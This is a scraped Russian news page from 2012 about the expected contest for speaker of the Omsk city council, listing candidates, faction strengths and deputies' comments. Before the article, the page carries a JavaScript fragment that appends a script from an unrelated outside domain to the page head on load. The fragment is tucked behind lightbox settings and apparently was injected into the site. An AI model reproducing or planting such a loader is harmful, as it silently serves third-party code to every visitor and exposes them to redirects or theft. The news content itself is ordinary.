, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
3 октября, 2012 Политика

Уже 10 октября в омский Горсовет могут выбрать спикера

uzhe-10-oktyabrya-v-omskij-gorsovet-mogut-vybrat-spikeraУже в следующую среду городской парламент Омска может получить постоянного спикера. Борьба за этот пост ожидается супержаркой и напряженной.

Через неделю, 10 октября, состоится очередное заседание Омского городского Совета, главным вопросом которого, скорее всего, станут выборы спикера. Кандидатов на этот пост ожидается очень много, и не факт, что депутатам удастся сделать свой выбор – в парламенте слишком сильны противоречия, в том числе внутрифракционные.

Сегодня и.о. спикера ГС, единоросс Василий Мамонтов намерен выдвинуть свою кандидатуру, как говорится, «на постоянку». В понедельник, 1 октября, фракция «Единая Россия» провела внутреннее рейтинговое голосование, по результатам которого Мамонтов набрал 8 голосов. Тем не менее, позиции и.о. спикера далеко не прочны. Его соперниками могут стать как представители других фракций, так и другие единороссы, среди которых выделяются руководители комитетов Юрий Федотов (финансы), Галина Горст (местное самоуправление) и Игорь Погребняк (ЖКХ). Не стоит сбрасывать со счетов и вице-спикера Алексея Сокина, кандидатуру которого, как считается, лоббирует сенатор Игорь Зуга.

Столь серьезное внутрифракционное противостояние единороссов означает невероятную интригу на внутрипартийной отчетно-выборной конференции. Она должна была состояться сегодня, но была перенесена на 8 октября «по техническим причинам». Учитывая, что на этой же конференции будет выбран новый секретарь регионального отделения «ЕР» (сейчас этот пост занимает депутат Заксобрания Александр Артемов), страсти будут кипеть.

К примеру, депутата Федотова, по мнению экспертов, будут двигать в спикеры мэр Вячеслав Двораковский и сенатор Андрей Голушко. Депутата Погребняка могут поддержать коммунисты, а за Галиной Горст, похоже, стоит губернатор Виктор Назаров. Чьи лоббистские возможности окажутся весомее – сейчас не скажет даже главный омский единоросс.

Что касается представителей других фракций, то они тоже темнят.

– Сейчас идет обсуждение со всеми кандидатами, непосредственно к заседанию мы решим, – сообщил РИА «Омск-Информ» куратор регионального отделения ЛДПР, депутат Госдумы Ян Зелинский. – Идут переговоры, в том числе, с представителями «Единой России» и КПРФ. Но мы склоняемся к тому, чтобы выдвинуть кандидата от нашей фракции.

По словам Зелинского, «своим» кандидатом для ЛДПР является депутат Алексей Ложкин, который уже баллотировался на пост спикера весной этого года, но набрал всего 2 голоса. Сейчас, по мнению либерал-демократов, у него больше шансов.

– Коль у «Единой России» не получается консолидировать свою кандидатуру, будет идеальный вариант для поддержки представителя самой малой фракции в городском Совете, – заявил Ян Зелинский.

У омских коммунистов, по словам первого секретаря областного обкома, депутата Госдумы Александра Кравца, целых 5 вариантов развития ситуации в день голосования за спикера.

– Работа у нас ведется, мы проигрываем самые разные варианты. Сейчас у нас пять различных вариантов, в зависимости от обстановки, – заявил Кравец. – Расклад очень сложен, ни одна из действующих сил преимуществ не имеет. У «Единой России» идут внутренние разборки, много желающих занять этот пост. У нашей фракции сплоченная команда, но в одиночку решить эту задачу у нас шансов нет, ситуация пока патовая.

Лидер омских коммунистов считает, что 10 октября спикер Горсовета может быть и не выбран – слишком сильны противоречия в парламенте.

– По моей информации, задача на грани невозможного. Если бы выборы были сегодня, никто из кандидатов не набрал бы положенных голосов, – отметил Александр Кравец.

В этой ситуации многое будет зависеть от депутатов-самовыдвиженцев (среди них наметился лидер – бизнесмен Валерий Кокорин) и фракции «Справедливая Россия». Последняя может выдвинуть своего руководителя Игоря Антропенко, который баллотировался в мэры города. Получить оперативный комментарий г-на Антропенко не удалось, возможно, сейчас он тоже проводит политические консультации.

Номинальный расклад сил в Горсовете выглядит так: «Единая Россия» – 20 депутатов, КПРФ – 10, «Справедливая Россия» – 3, ЛДПР – 2, самовыдвиженцы – 4. Как эти 39 человек будут взаимодействовать 10 октября, сейчас не скажет никто. Тем интереснее будет наблюдать за развитием событий.
Источник.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Политика